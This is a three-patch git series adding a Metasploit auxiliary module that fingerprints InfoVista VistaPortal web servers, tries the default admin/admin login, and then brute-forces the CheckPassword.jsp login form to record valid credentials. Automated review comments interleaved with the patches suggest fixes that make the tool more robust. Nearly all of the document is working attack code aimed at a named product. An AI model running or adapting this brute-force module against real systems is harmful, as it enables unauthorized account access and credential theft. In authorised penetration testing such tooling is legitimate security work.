From ba5943426137f58128a847918125826a615f4788 Mon Sep 17 00:00:00 2001
From: KarnGaneshen
Date: Sat, 15 Jun 2013 17:16:26 +0530
Subject: [PATCH 1/3] added infovista module
---
 .../auxiliary/scanner/http/infovista_enum.rb | 136 ++++++++++++++++++
 1 file changed, 136 insertions(+)
 create mode 100644 modules/auxiliary/scanner/http/infovista_enum.rb
diff --git a/modules/auxiliary/scanner/http/infovista_enum.rb b/modules/auxiliary/scanner/http/infovista_enum.rb
new file mode 100644
index 0000000000..eb053f0158
--- /dev/null
+++ b/modules/auxiliary/scanner/http/infovista_enum.rb
@@ -0,0 +1,136 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'rex/proto/http' +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner + + # + # CONSTANTS + # Used to check if remote app is InfoVista + # + + INFOVISTA_FINGERPRINT = 'InfoVista® VistaPortal®' + + def initialize(info={}) + super(update_info(info, + 'Name' => 'InfoVista VistaPortal Application Brute Force Login Utility', + 'Description' => %{ + This module attempts to scan for InfoVista VistaPortal Web Application, finds its version + and performs login brute force to identify valid credentials. + }, + 'Author' => + [ + 'Karn Ganeshen ', + ], + 'License' => MSF_LICENSE + )) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]), + OptString.new('TARGETURI', [true, "URI for Web login. Default: /VPortal/mgtconsole/CheckPassword.jsp", "/VPortal/mgtconsole/CheckPassword.jsp"]) + ], self.class) + end + + def run_host(ip) + unless is_app_infovista? + print_error("#{rhost}:#{rport} -> Application does not appear to be InfoVista VistaPortal. Module will not continue.") + return + end + + status = try_default_credential + return if status == :abort + + print_status("#{rhost}:#{rport} -> Brute-forcing...") + each_user_pass do |user, pass| + do_login(user, pass) + end + end + + # + # What's the point of running this module if the app actually isn't InfoVista? + # + def is_app_infovista? 
+ + res = send_request_cgi( + { + 'uri' => '/VPortal/', + 'method' => 'GET' + }) + + if (res and res.code == 200 and res.body.include?(INFOVISTA_FINGERPRINT)) + version_key = /PORTAL_VERSION = (.+)./ + version = res.body.scan(version_key).flatten[0].gsub('"','') + print_good("#{rhost}:#{rport} -> Application version is #{version}") + return true + else + return false + end + end + + # + # Test and see if the default credential works + # + def try_default_credential + user = 'admin' + pass = 'admin' + do_login(user, pass) + end + + # + # Brute-force the login page + # + def do_login(user, pass) + vprint_status("#{rhost}:#{rport} -> Trying username:#{user.inspect} with password:#{pass.inspect}") + begin + res = send_request_cgi( + { + 'uri' => '/VPortal/mgtconsole/CheckPassword.jsp', + 'method' => 'POST', + 'vars_post' => + { + 'Login' => user, + 'password' => pass + } + }) + + get_response = "\r\n" + + if (not res or res.code != 200 and res.body != "#{get_response}") + vprint_error("#{rhost}:#{rport} -> FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}") + return :skip_pass + else + print_good("#{rhost}:#{rport} -> SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + + report_hash = { + :host => rhost, + :port => rport, + :sname => 'InfoVista VistaPortal', + :user => user, + :pass => pass, + :active => true, + :type => 'password'} + + report_auth_info(report_hash) + return :next_user + end + + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + print_error("#{rhost}:#{rport} -> HTTP Connection Failed, Aborting") + return :abort + end + end + +end From 3cd94f5025bee5441995b160aa5acb0039fce176 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 16 Jun 2013 11:50:40 -0500 Subject: [PATCH 2/3] Do final cleanup for infovista_enum --- .../auxiliary/scanner/http/infovista_enum.rb | 37 +++++++------------ 1 file changed, 14 insertions(+), 23 deletions(-) 
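Review bot: In `is_app_infovista?`, `res.body.scan(version_key).flatten[0]` is nil whenever the page matches the fingerprint but carries no `PORTAL_VERSION` string, so the following `.gsub('"','')` raises NoMethodError out of the detection step instead of the method returning true. Guard the capture before cleaning it, e.g. `version = res.body.scan(version_key).flatten.first` followed by `version = version ? version.gsub('"', '') : 'unknown'`. The pattern `/PORTAL_VERSION = (.+)./` also looks unintended: `(.+)` greedily takes the rest of the line and the trailing `.` only drops its last character, so if the value is delimited (quote, semicolon) the regex should anchor on that delimiter instead. The same lines are carried unchanged through the `@@ -70,10` hunk of the second patch and the re-indent hunk of the third.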
diff --git a/modules/auxiliary/scanner/http/infovista_enum.rb b/modules/auxiliary/scanner/http/infovista_enum.rb index eb053f0158..bd8985d042 100644 --- a/modules/auxiliary/scanner/http/infovista_enum.rb +++ b/modules/auxiliary/scanner/http/infovista_enum.rb @@ -15,19 +15,12 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Scanner - # - # CONSTANTS - # Used to check if remote app is InfoVista - # - - INFOVISTA_FINGERPRINT = 'InfoVista® VistaPortal®' - def initialize(info={}) super(update_info(info, 'Name' => 'InfoVista VistaPortal Application Brute Force Login Utility', 'Description' => %{ - This module attempts to scan for InfoVista VistaPortal Web Application, finds its version - and performs login brute force to identify valid credentials. + This module attempts to scan for InfoVista VistaPortal Web Application, finds its + version and performs login brute force to identify valid credentials. }, 'Author' => [ @@ -46,14 +39,14 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless is_app_infovista? - print_error("#{rhost}:#{rport} -> Application does not appear to be InfoVista VistaPortal. Module will not continue.") + print_error("#{rhost}:#{rport} - Application does not appear to be InfoVista VistaPortal. Module will not continue.") return end status = try_default_credential return if status == :abort - print_status("#{rhost}:#{rport} -> Brute-forcing...") + print_status("#{rhost}:#{rport} - Brute-forcing...") each_user_pass do |user, pass| do_login(user, pass) end 
@@ -70,10 +63,10 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) - if (res and res.code == 200 and res.body.include?(INFOVISTA_FINGERPRINT)) + if (res and res.code == 200 and res.body =~ /InfoVista.*VistaPortal/) version_key = /PORTAL_VERSION = (.+)./ version = res.body.scan(version_key).flatten[0].gsub('"','') - print_good("#{rhost}:#{rport} -> Application version is #{version}") + print_good("#{rhost}:#{rport} - Application version is #{version}") return true else return false @@ -93,11 +86,11 @@ class Metasploit3 < Msf::Auxiliary # Brute-force the login page # def do_login(user, pass) - vprint_status("#{rhost}:#{rport} -> Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { - 'uri' => '/VPortal/mgtconsole/CheckPassword.jsp', + 'uri' => target_uri.to_s, 'method' => 'POST', 'vars_post' => { @@ -106,13 +99,10 @@ class Metasploit3 < Msf::Auxiliary } }) - get_response = "\r\n" - - if (not res or res.code != 200 and res.body != "#{get_response}") - vprint_error("#{rhost}:#{rport} -> FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}") - return :skip_pass + if (not res or res.code != 200 or res.body !~ /location.href.*AdminFrame\.jsp/) + vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}") else - print_good("#{rhost}:#{rport} -> SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_hash = { :host => rhost, 
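Review bot: The `send_request_cgi` call in `is_app_infovista?` (the method starts above this hunk) is not covered by the connection-error rescue that `do_login` has, so a refused or timed-out connection to `/VPortal/` raises out of the probe instead of ending the host cleanly the way the login path does; the Scanner mixin may catch it per host, but the module's own reporting would then differ between the two requests. Wrap the probe the same way, `rescue ::Rex::ConnectionError, ::Errno::EPIPE` then `print_error("#{rhost}:#{rport} - HTTP Connection Failed")` and `return false`, so a failed probe is reported once and the host is skipped. The new fingerprint `/InfoVista.*VistaPortal/` is looser than the dropped constant and only matches when both words share a line; a short comment naming the page element it was taken from would help the next maintainer tighten it.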
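Review bot: `'uri' => target_uri.to_s` hands the raw TARGETURI string to the login request, while the fingerprint probe earlier in the file still hardcodes `/VPortal/`; if an operator points TARGETURI at a different context root the login goes there but the detection that gates it does not. Use the HttpClient path helper, `'uri' => normalize_uri(target_uri.path),`, and consider deriving the probe path from the same option so both requests agree. The enclosing `do_login` begins before this hunk and ends after it.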
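Review bot: The rewritten guard `if (not res or res.code != 200 or ...)` correctly takes the failure branch when `res` is nil, but the `vprint_error` inside it then interpolates `#{res.code}`, which raises NoMethodError on nil — a request that yields no response object (which `send_request_cgi` can do on a read failure) would abort the iteration instead of logging one failed attempt. Compute the text defensively before the message, e.g. `code = res ? res.code : 'no response'`, and interpolate `#{code}`. While here, `!res || res.code != 200 || ...` avoids the low-precedence `not`/`or` forms and reads the same as the rest of the framework. `do_login` begins before this hunk and ends after it.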
@@ -121,14 +111,15 @@ class Metasploit3 < Msf::Auxiliary :user => user, :pass => pass, :active => true, - :type => 'password'} + :type => 'password' + } report_auth_info(report_hash) return :next_user end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - print_error("#{rhost}:#{rport} -> HTTP Connection Failed, Aborting") + print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting") return :abort end end From d20f72a9fd047fff4e2a2319e96f7b1302f7b2d6 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 16 Jun 2013 15:18:19 -0500 Subject: [PATCH 3/3] Fix indentation --- .../auxiliary/scanner/http/infovista_enum.rb | 27 +++++++++---------- 1 file changed, 13 insertions(+), 14 deletions(-) diff --git a/modules/auxiliary/scanner/http/infovista_enum.rb b/modules/auxiliary/scanner/http/infovista_enum.rb index bd8985d042..60ae668113 100644 --- a/modules/auxiliary/scanner/http/infovista_enum.rb +++ b/modules/auxiliary/scanner/http/infovista_enum.rb @@ -56,21 +56,20 @@ class Metasploit3 < Msf::Auxiliary # What's the point of running this module if the app actually isn't InfoVista? # def is_app_infovista? + res = send_request_cgi( + { + 'uri' => '/VPortal/', + 'method' => 'GET' + }) - res = send_request_cgi( - { - 'uri' => '/VPortal/', - 'method' => 'GET' - }) - - if (res and res.code == 200 and res.body =~ /InfoVista.*VistaPortal/) - version_key = /PORTAL_VERSION = (.+)./ - version = res.body.scan(version_key).flatten[0].gsub('"','') - print_good("#{rhost}:#{rport} - Application version is #{version}") - return true - else - return false - end + if (res and res.code == 200 and res.body =~ /InfoVista.*VistaPortal/) + version_key = /PORTAL_VERSION = (.+)./ + version = res.body.scan(version_key).flatten[0].gsub('"','') + print_good("#{rhost}:#{rport} - Application version is #{version}") + return true + else + return false + end end #